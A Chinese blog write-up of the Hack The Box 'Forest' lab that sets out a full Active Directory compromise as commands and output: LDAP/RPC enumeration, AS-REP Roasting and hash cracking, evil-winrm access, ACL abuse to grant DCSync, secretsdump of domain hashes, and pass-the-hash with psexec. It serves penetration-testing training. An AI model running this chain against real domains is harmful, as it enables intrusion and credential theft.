[HTB] Forest 域靶机渗透全流程

原创 已于 2025-10-07 18:27:42 修改 · 986 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2025-10-07 18:16:10 首次发布

概述

HTB Forest 是一台 Windows Active Directory 环境 的靶机,难度评级为 Easy。该靶机重点考察了以下域渗透核心知识点:
在这里插入图片描述

  • AS-REP Roasting 攻击
  • ACL 权限滥用
  • DCSync 权限提权

本文完整记录了从信息收集到最终域管理员权限获取的全过程,详细展示了每一步的命令、思路及工具使用,适合正在学习 Windows 域渗透与权限提升 的安全研究人员和渗透测试初学者。

阶段 1:信息收集与域环境识别

1.1 Nmap 扫描

首先对目标主机进行端口全扫描,识别开放的服务及域信息:

nmap -Pn -sC -sV -p- -sT -T4 10.129.138.186

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-08 12:37:52Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49681/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
50018/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

关键信息:

  • 域名:htb.local
  • 主机名:FOREST
  • 系统版本:Windows Server 2016 Standard
  • 开放端口:53、88、135、389、445、593、5985、9389 等

说明目标是一个 Active Directory 域控制器 环境。

1.2 SMB 枚举

smbclient -L 10.129.138.186

Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.138.186 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

crackmapexec smb 10.129.138.186 -u '' -p '' --shares

在这里插入图片描述

发现 message_signing 启用且必需,匿名访问受限,但仍可识别出主机域名和工作组信息。

1.3 获取密码策略

crackmapexec smb 10.129.138.186 --pass-pol

结果:
在这里插入图片描述

  • 密码最小长度:7
  • 密码复杂度:启用
  • 账号锁定阈值:0(无限制)

可进行 密码喷射攻击(Password Spraying)

1.4 LDAP 枚举

使用 ldapsearch 匿名绑定,成功获取域用户信息:

ldapsearch -x -H ldap://10.129.138.186 -b "dc=htb,dc=local" '(objectClass=User)' sAMAccountName

再删除掉Guesr,DefaultAccount,机器账户,SM,Health等内容
在这里插入图片描述

提取得到用户名列表,保存为userlist.ldap字典文件:

sebastien
lucinda
andy
mark
santi

1.5 RPC 枚举

rpcclient -N 10.129.138.186 -U ''
rpcclient $> enumdomusers # 枚举域用户
rpcclient $> enumdomgroups # 枚举域组
rpcclient $> querydominfo # 查询域信息

相较于ldap查询,通过RPC又多获取了一个用户名:svc-alfresco,将其加入userlist.ldap字典文件。
在这里插入图片描述

查询svc-alfresco用户的相关信息

queryuser svc-alfresco
# 或者通过rid查询
queryuser 0x47b

在这里插入图片描述
查询用户的组信息

queryusergroups svc-alfresco
# 有时候直接用户名查询不行,再尝试一下rid
queryusergroups 0x47b

        group rid:[0x201] attr:[0x7]
        group rid:[0x47c] attr:[0x7]

查询组信息

# querygroup [rid]
rpcclient $> querygroup 0x201
        Group Name:     Domain Users
        Description:    All domain users
        Group Attribute:7
        Num Members:30
rpcclient $> querygroup 0x47c
        Group Name:     Service Accounts
        Description:
        Group Attribute:7
        Num Members:1
rpcclient $>

通过 enumdomusersqueryusergroups 确认 svc-alfresco 属于 Service Accounts 组。

阶段 2:初始访问 — AS-REP Roasting

由于部分用户未启用 Kerberos 预身份验证,可直接对其进行 AS-REP Roasting 攻击。

impacket-GetNPUsers htb.local/ -dc-ip 10.129.138.186 -usersfile userlist.ldap -outputfile asrep.hash

得到可爆破的哈希:
在这里插入图片描述

$krb5asrep$23$svc-alfresco@HTB.LOCAL:7ebe9ca839dedfeafa80d90e06333d6f...

使用 Hashcat 爆破:

hashcat -m 18200 asrep.hash rockyou.txt

成功爆出密码:
在这里插入图片描述

svc-alfresco : s3rvice

阶段 3:系统访问与信息收集

3.1 Evil-WinRM 登录

evil-winrm -i 10.129.138.186 -u svc-alfresco -p 's3rvice'

成功登录:
在这里插入图片描述

获取 user.txt flag。
在这里插入图片描述

3.2 主机与域信息收集

对红色方框用户执行net user发现都是普通域用户
在这里插入图片描述

3.3 BloodHound 数据收集

上传并执行 SharpHound:

.\SharpHound.exe -c all

将结果文件下载至 Kali:

kali:impacket-smbserver -smb2support share /tmp/smbshare
靶机:copy .\BloodHound.zip \\10.10.14.6\share\

阶段 4:权限提升 — ACL 滥用到 DCSync

4.1 BloodHound 分析路径

选择“从域用户到零层/高价值目标的最短路径”
在这里插入图片描述

提权路径:
在这里插入图片描述

在 BloodHound 中分析用户关系,发现:

  • svc-alfresco 属于 Service Accounts
  • Service Accounts 属于 Privileged IT Accounts
  • Privileged IT Accounts 属于 Account Operators
  • Account OperatorsExchange Windows Permissions 拥有 GenericAll 权限
  • Exchange Windows Permissions 组具有 WriteDACL 权限,可修改域对象 ACL

即:可通过 修改 DACL → 赋予 DCSync 权限 → 提权为域管

4.2 新建用户并赋权

evil-winrm:

net user john Abc123! /add /domain
net group "Exchange Windows Permissions" john /add
net localgroup "Remote Management Users" john /add

4.3 使用 PowerView 修改 DACL

evil-winrm:

upload PowerView.ps1
. .\PowerView.ps1

$pass = ConvertTo-SecureString 'Abc123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\john', $pass)

Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync

4.4 执行 DCSync 获取域哈希

impacket-secretsdump htb/john@10.129.138.186


[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
------[skip]------
[*] Cleaning up...

成功导出 Administrator 哈希。

4.5 横向移动至域控

使用哈希登录:

impacket-psexec administrator@10.129.138.186 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

C:\Users\Administrator\Documents> whoami
htb\administrator

C:\users\administrator\desktop>type root.txt

成功获取系统最高权限并访问 root.txt

阶段 5:结果与总结

5.1 获取结果

  • 初始用户:svc-alfresco

  • 域管用户:administrator

  • 攻击链:

    LDAP/RPC 枚举 → AS-REP Roasting → WinRM 登录 →
BloodHound 分析 → ACL 滥用 → DCSync 提权

思路总结与学习要点

  1. LDAP 枚举的重要性
    匿名 LDAP 查询可直接获取用户清单,是发现弱口令与 Kerberos 攻击对象的关键。

  2. AS-REP Roasting 攻击逻辑
    当用户禁用 Kerberos 预身份验证时,攻击者可直接请求 TGT 并离线爆破其哈希。

  3. BloodHound 的价值
    它帮助可视化域内权限关系,快速识别可滥用路径,如 GenericAll、WriteDACL、ForceChangePassword 等。

  4. ACL 与 DCSync 提权链
    掌握 “GenericAll → WriteDACL → DCSync” 的提权思路,是域渗透进阶的核心技能。

注意:本文记录的渗透测试技术仅用于教学目的,所有测试都应在授权环境中进行。

HTB-Forest
weixin_45434043的博客
03-26 1337
目录HTB-Forest[1]侦擦与枚举[1.1]开放的端口 HTB-Forest [1]侦擦与枚举 [1.1]开放的端口 ·使用nmap扫描开放的端口以及有用的信息 root@kali:~/HTB/Forest# nmap -sC -sV -oA nmap/Forest 10.10.10.161 我们可以发现: 使用Kerberos打开了88端口 通常在Windows Server Dom...
HTBForest[WriteUP]
如有错误感谢斧正
01-28 1102
靶机Domain:forest.htb靶机IP:10.10.10.161。分配IP:10.10.16.21。88端口:Kerberos服务。5985端口:Win-RM服务。账户:svc-alfresco。AD名:htb.local。53端口:Domain服务。389端口:LDAP服务。445端口:SMB服务。密码:s3rvice。
HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)
墨痕诉清风的博客
05-28 1751
列出了相当多的用户,因此我复制了完整的列表并将其添加到名为user.txt的文件中,然后使用Linux-fu对其进行清理并将其放入名为users.txt的新文件中。此组的成员可以创建和修改大多数类型的帐户,包括用户、本地组和全局组的帐户。这显示了当前用户是3个组的一部分,但我可以在这里看到“特权IT帐户”,这是我在使用net user命令时没有看到的。由于我到达了嵌套路径的末尾,我决定在“帐户操作员”组上运行相同的命令,只是这次我不会选择特定的字段,以便我可以获得有关该组的一些信息。
29 HTB Forest 机器 - 容易 (2)
Li_Wisworth的博客
08-08 1105
使用bloodhood加载数据,“Queries” - “Find Shorter Paths to Domain Admin”从当前拥有的svc-alfresco账户权限提升至管理员组(Domain Admins)中的Administrator账户,需要完成两次权限跃升。
HTB-forest
2201_75378806的博客
05-19 788
因为比较简单就随笔记了rpcclient 罗列用户user:[mark] rid:[0x47f] user:[santi] rid:[0x480] 利用awk等命令该文本中的用户名提取出来可以使用awk命令来提取文本中的用户名。假设你的文本保存在一个文件中,比如,你可以使用以下命令:​-F'[][]':指定awk使用方括号[]作为字段分隔符。:当行中包含字符串"user:"时,打印第二个字段。使用这个命令,它将提取出文本中所有包含"user:"的行中的用户名。
HTB APT靶机渗透测试流程
RemedyVI的博客
07-26 1147
通过rpcmap枚举135端口rpc服务的UUID和操作数,通过nday漏洞远程获取IPv6地址,重新端口扫描,通过开放的smb服务端口拿到backup.zip文件,破解拿到ntds.dit和SYSTEM,利用secretsdump获取用户信息,筛选出有用信息后利用getTGT进行密码喷洒拿到henry.vinson用户的密码hash,但是权限不足或有WAF拿不到shell。
[HTB] Mantis 靶机渗透全流程
qq_62682007的博客
10-14 1078
Mantis 是 HackTheBox 上的 Windows 环境靶机,涉及 Web 应用和数据库安全。通过 Nmap 扫描发现开放了 DNS、Kerberos、SQL Server 和 IIS 服务。在 8080 端口发现 Orchard CMS 系统,但未能直接利用。1337 端口运行 IIS 7.5 开发服务器,1433 端口为 SQL Server 2014。最终通过分析开发文件获取凭证,并利用 MS14-068 Kerberos 漏洞实现权限提升,完成对该靶机渗透测试。
28 HTB Forest 机器 - 容易 (1)
Li_Wisworth的博客
08-07 844
我的本地机器已安装 BloodHound(若未安装,可通过 git clone https://github.com/BloodHoundAD/BloodHound.git 获取)。是一款专为渗透测试设计的 Windows 远程管理(WinRM)工具,用于通过 WinRM 协议与目标 Windows 主机交互,提供类似 Shell 的操作环境。(2)将BloodHound收集的结果文件(20191018035324_BloodHound.zip)复制到攻击者的 SMB 共享目录。
HTB靶场系列 Windows靶机 Blue靶机
m0_57221101的博客
01-26 1612
ms17-010漏洞,也就是广为人知的永恒之蓝,非常简单的一个靶机,因为几乎不用提权,ms17-010漏洞使用成功获取的就是system级别的权限 勘探 常规操作 先用nmap扫 nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.40 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:00 EDT Warning: 10.10.10.40 giving up on por
HTB-oscplike-Forest
m0_53302733的博客
04-10 2636
HTB-oscplike-Forest easy难度的forest 靶机IP 10.10.10.161 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.161 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-09 10:45:13Z) 135/tcp
hackthebox- Froest (考点:Kerberos pre-authentication/win-rm&5985/渗透
冬萍子癸水
04-17 3273
nullinux rpcclient -U "" -N 10.10.10.161 enumdomusers gem install evil-winrm 科普
No.90-HackTheBox-windows-Forest-Walkthrough渗透学习
qq_34801745的博客
05-06 1035
** HackTheBox-windows-Forest-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/212 靶机难度:中级(4.6/10) 靶机发布日期:2020年3月17日 靶机描述: Forest in an easy difficulty Windows Domain Controller (DC)...
HTB打靶(Active Directory 101 Forest)
qq_18811919的博客
12-25 1725
HackTheBox Active Directory 101 Forest
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8845
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于改进YOLOv8的文本识别检测系统源码分享与一条龙教学项目_该项目是一个集成了从数据准备到模型部署全流程的深度学习应用系统核心内容围绕YOLOv8目标检测模型在复杂文本识别任.zip
12-12
基于改进YOLOv8的文本识别检测系统源码分享与一条龙教学项目_该项目是一个集成了从数据准备到模型部署全流程的深度学习应用系统核心内容围绕YOLOv8目标检测模型在复杂文本识别任.zip
(63页PPT)某智慧小区全面解决方案.pptx
12-12
(63页PPT)某智慧小区全面解决方案.pptx
(74页PPT)DG大型制造业企业数据架构顶层设计总体规划方案.pptx
12-12
(74页PPT)DG大型制造业企业数据架构顶层设计总体规划方案.pptx
(80页PPT)社会综治一网统管解决方案.pptx
最新发布
12-12
(80页PPT)社会综治一网统管解决方案.pptx
深入解析Hack the Box Easy难度靶机渗透技巧
资源摘要信息:"Hack the Box(HTB)是一个面向网络安全专业人士和爱好者的在线平台,提供了一系列的虚拟机作为靶机进行渗透测试。这些靶机按照难度被分为Easy、Medium、Hard等不同级别。‘Hack the box的Easy难度...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值